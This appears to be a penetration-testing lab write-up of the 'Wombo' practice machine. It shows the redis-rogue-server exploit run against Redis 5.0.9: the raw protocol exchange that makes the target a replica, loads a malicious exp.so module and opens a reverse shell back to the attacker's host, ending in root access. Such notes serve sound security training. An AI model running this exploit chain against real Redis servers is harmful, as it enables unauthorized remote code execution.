redis-rogue-server

The target Redis instance runs the version 5.0.9. Testing it for the rogue server attack leveraging the Redis’s master/slave relationship

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/wombo]
└─$ git clone https://github.com/n0b0dyCN/redis-rogue-server ; cd redis-rogue-server
Cloning into 'redis-rogue-server'...
remote: Enumerating objects: 87, done.
remote: Counting objects: 100% (4/4), done.
remote: Compressing objects: 100% (4/4), done.
remote: Total 87 (delta 0), reused 1 (delta 0), pack-reused 83 (from 1)
Receiving objects: 100% (87/87), 245.56 KiB | 3.36 MiB/s, done.
Resolving deltas: 100% (19/19), done.

Downloading the exploit package to Kali

Initially, the exploit just hangs at setting the malicious payload to the dbfilename attribute

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/wombo/redis-rogue-server]
└─$ python3 redis-rogue-server.py --rhost=192.168.209.69 --lhost=192.168.45.192 --lport=80 -v
/home/kali/PEN-200/PG_PRACTICE/wombo/redis-rogue-server/redis-rogue-server.py:10: SyntaxWarning: invalid escape sequence '\ '
  BANNER = """______         _ _      ______                         _____
______         _ _      ______                         _____                          
| ___ \       | (_)     | ___ \                       /  ___|                         
| |_/ /___  __| |_ ___  | |_/ /___   __ _ _   _  ___  \ `--.  ___ _ ____   _____ _ __ 
|    // _ \/ _` | / __| |    // _ \ / _` | | | |/ _ \  `--. \/ _ \ '__\ \ / / _ \ '__|
| |\ \  __/ (_| | \__ \ | |\ \ (_) | (_| | |_| |  __/ /\__/ /  __/ |   \ V /  __/ |   
\_| \_\___|\__,_|_|___/ \_| \_\___/ \__, |\__,_|\___| \____/ \___|_|    \_/ \___|_|   
                                     __/ |                                            
                                    |___/                                             
@copyright n0b0dy @ r3kapig
 
[info] TARGET 192.168.209.69:6379
[info] SERVER 192.168.45.192:80
[info] Setting master...
[<-] b'*3\r\n$7\r\nSLAVEOF\r\n$14\r\n192.168.45.192\r\n$2\r\n80\r\n'
[->] b'+OK\r\n'
[info] Setting dbfilename...
[<-] b'*4\r\n$6\r\nCONFIG\r\n$3\r\nSET\r\n$10\r\ndbfilename\r\n$6\r\nexp.so\r\n'
[->] b'+OK\r\n'
[->] b'*1\r\n$4\r\nPING\r\n'
[<-] b'+PONG\r\n'
[->] b'*3\r\n$8\r\nREPLCONF\r\n$14\r\nlistening-port\r\n$4\r\n6379\r\n'
[<-] b'+OK\r\n'
[->] b'*5\r\n$8\r\nREPLCONF\r\n$4\r\ncapa\r\n$3\r\neof\r\n$4\r\ncapa\r\n$6\r\npsync2\r\n'
[<-] b'+OK\r\n'
[->] b'*3\r\n$5\r\nPSYNC\r\n$40\r\n3aae58126d66cbc6f20171a1c4455492f1063543\r\n$1\r\n1\r\n'
[<-] b'+FULLRESYNC ZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZ 1\r\n$44320\r\n\x7fELF\x02\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00'......b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x11\x00\x00\x00\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00J\xa6\x00\x00\x00\x00\x00\x00\xd3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\r\n'
[info] Loading module...
[<-] b'*3\r\n$6\r\nMODULE\r\n$4\r\nLOAD\r\n$8\r\n./exp.so\r\n'
[->] b'-ERR Error loading the extension. Please check the server logs.\r\n'
[info] Temerory cleaning up...
[<-] b'*3\r\n$7\r\nSLAVEOF\r\n$2\r\nNO\r\n$3\r\nONE\r\n'
[->] b'+OK\r\n'
[<-] b'*4\r\n$6\r\nCONFIG\r\n$3\r\nSET\r\n$10\r\ndbfilename\r\n$8\r\ndump.rdb\r\n'
[->] b'+OK\r\n'
[<-] b'*2\r\n$11\r\nsystem.exec\r\n$11\r\nrm ./exp.so\r\n'
[->] b'$0\r\n\r\n'
What do u want, [i]nteractive shell or [r]everse shell:

However, executing the exploit again with a different rogue Redis port on Kali works. This suggests that there might be a presence of firewall in place

What do u want, [i]nteractive shell or [r]everse shell: r
[info] Open reverse shell...
Reverse server address: 192.168.45.192
Reverse server port: 27017
[info] Reverse shell payload sent.
[info] Check at 192.168.45.192:27017
[info] Unload module...

Leveraging the supplied exp.so file, I can invoke a reverse shell

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/wombo/redis-rogue-server]
└─$ nnc 27017
listening on [any] 27017 ...
connect to [192.168.45.192] from (UNKNOWN) [192.168.209.69] 35654
whoami
root
hostname
wombo
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
3: ens192: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
    link/ether 00:50:56:9e:be:da brd ff:ff:ff:ff:ff:ff
    inet 192.168.209.69/24 brd 192.168.209.255 scope global ens192
       valid_lft forever preferred_lft forever

Initial Foothold established to the target system as the root account via the rogue server attack System level compromise

InfoSec LAB

Explorer

Wombo_Exploitation

redis-rogue-server

Interactive Graph View

Backlinks